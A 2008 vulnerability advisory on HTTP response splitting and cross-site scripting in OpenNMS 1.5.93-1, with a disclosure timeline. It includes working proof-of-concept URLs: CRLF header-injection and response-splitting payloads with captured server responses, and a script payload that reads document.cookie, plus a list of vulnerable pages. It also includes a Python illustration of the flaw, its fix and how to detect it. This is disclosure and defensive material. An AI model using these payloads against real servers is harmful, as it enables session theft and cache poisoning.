OpenNMS Multiple Vulnerabilities
BugSec | Security Advisory
Moshe Ben-Abu | Security Expert
Advisory URL (PDF): http://www.bugsec.com/up_files/OpenNMS_Multiple_Vulnerabilities.pdf
OPENNMS MULTIPLE VULNERABILITIES
Vendor
Application Description
OpenNMS HTTP Response Splitting Vulnerability
  Vulnerability Information
  Vulnerability Details
  Proof-of-Concept
OpenNMS Cross-Site Scripting Vulnerabilities
  Vulnerability Information
  Vulnerability Details
  Proof-of-Concept
Security Analysis
  Discovery
  Disclosure Timeline
About BugSec LTD.
References
Vendor
OpenNMS Group – http://www.opennms.com
OpenNMS Project – http://www.opennms.org
Application Description
“OpenNMS is the world's first enterprise grade network management platform developed under the open source model. It consists of a community supported open-source project as well as a commercial services, training, and support organization.” - From OpenNMS Project website.
OpenNMS HTTP Response Splitting Vulnerability

Vulnerability Information
Remotely exploitable: Yes
Locally exploitable: No
Affected versions:
• OpenNMS 1.5.93-1
Other versions may also be affected.
Proof-of-Concept

Header injection:
http://server/opennms/event/query?%0D%0AInjectedHeader:%20BugSec

Server response:
HTTP/1.1 302 Moved Temporarily
Date: Thu, 25 Sep 2008 11:30:05 GMT
Server: Apache/2.2.3
Location: http://server/opennms/event/list?
InjectedHeader: BugSec=
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

HTTP Response Splitting:
http://server/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%2036%0D%0A%0D%0A<html><body>BugSec</body></html><!--

Server response:
HTTP/1.1 302 Moved Temporarily
Date: Thu, 25 Sep 2008 11:35:20 GMT
Server: Apache/2.2.3
Location: http://server/opennms/event/list?
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 36

<html><body>BugSec</body></html><!--=
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8
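The splitting shown in the responses above, reproduced as an added Python example (not OpenNMS code): a redirect builder that copies the query text into Location verbatim, beside a hardened one that percent-encodes it, plus two checks a defender can run over a captured response to spot a second status line or an injected header. The 302 serialisation, the constants and all function names are constructed for illustration; only the Location value and the injected bytes come from the advisory.

```python
import re
from urllib.parse import quote

# Constructed from the advisory's PoC: the query text sent to /opennms/event/query,
# which OpenNMS 1.5.93-1 copied verbatim into the Location header of its redirect.
SPLIT_QUERY = (
    "\r\nContent-Length: 0\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 36\r\n\r\n"
    "<html><body>BugSec</body></html><!--"
)
HEADER_QUERY = "\r\nInjectedHeader: BugSec"
REDIRECT_BASE = "http://server/opennms/event/list?"
_STATUS_LINE = re.compile(rb"^HTTP/\d\.\d \d{3} [^\r\n]*\r\n", re.M)
_CTL = re.compile(r"[\x00-\x1f\x7f]")

def render_redirect(location: str) -> bytes:
    """Serialise a 302 the way the advisory shows it (Date/Server headers omitted)."""
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\nConnection: close\r\n\r\n"
    ).encode("latin-1")

def redirect_unsafe(query: str) -> bytes:
    """Vulnerable pattern: untrusted query text is concatenated into Location as-is.
    The trailing '=' mirrors the advisory's responses, where the injected text was
    treated as a parameter name."""
    return render_redirect(REDIRECT_BASE + query + "=")

def redirect_safe(query: str) -> bytes:
    """Hardened: percent-encode the untrusted part so CR/LF become %0D%0A and can
    never terminate the header, then refuse to emit any remaining control byte."""
    encoded = quote(query, safe="&=:/?")
    if _CTL.search(encoded):
        raise ValueError("control character in Location header")
    return render_redirect(REDIRECT_BASE + encoded + "=")

def count_status_lines(raw: bytes) -> int:
    """A single well-formed response has exactly one status line; a second one at
    the start of a line is the signature of a split response."""
    return len(_STATUS_LINE.findall(raw))

def header_names(raw: bytes) -> list:
    """Header names of the first response block, for spotting injected headers."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:]]
```

The same percent-encoding rule applies to any value a servlet places in a header; an HTTP response can never be "un-split" once it has left the server, so the check belongs before the header is written.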
OpenNMS Cross-Site Scripting Vulnerabilities

Vulnerability Information
Remotely exploitable: Yes
Locally exploitable: No
Affected versions:
• OpenNMS 1.5.93-1
Other versions may also be affected.
Vulnerability Details
An input validation problem exists within OpenNMS that allows execution of arbitrary client-side code, resulting in a cross-site scripting vulnerability. An attacker may leverage this cross-site scripting vulnerability to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Proof-of-Concept
surveillanceView.htm - viewName
http://server/opennms/surveillanceView.htm?viewName=<script>alert(document.cookie)</script>
Vulnerable pages:
http://server/opennms/asset/modifyAsset
http://server/opennms/distributedStatusDetails.htm
http://server/opennms/distributedStatusHistory.htm
http://server/opennms/event/query
http://server/opennms/graph/adhoc2.jsp
http://server/opennms/graph/chooseresource.htm
http://server/opennms/graph/results.htm
http://server/opennms/ksc/customView.htm
http://server/opennms/ksc/formProcMain.htm
http://server/opennms/notification/browse
http://server/opennms/notification/list.jsp
http://server/opennms/outage/list
http://server/opennms/rtc/category.jsp
http://server/opennms/statisticsReports/index.htm
http://server/opennms/statisticsReports/report.htm
http://server/opennms/surveillanceView.htm
Security Analysis

Discovery
Moshe Ben-Abu
BugSec LTD. - Security Consulting Company
http://www.bugsec.com
Disclosure Timeline
25/09/2008 – BugSec Security Team notifies the OpenNMS team about security vulnerabilities discovered in OpenNMS, sending a security advisory draft.
25/09/2008 – Vendor acknowledgment notification.
26/09/2008 – OpenNMS 1.5.94 released, fixing the HTTP response splitting vulnerability but not the cross-site scripting vulnerabilities.
01/10/2008 – OpenNMS 1.5.96 released, fixing the cross-site scripting vulnerabilities.
05/10/2008 – Advisory released.
About BugSec LTD.
BugSec Services provides IT and application security services for large-scale organizations. Among its services: penetration testing, risk assessments, secure code development and guidance.
BugSec Solutions develops innovative products and tools that give focused solutions to systems data security issues, such as web application security, secure coding and anti-phishing solutions.
References
“HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics” by Amit Klein, http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf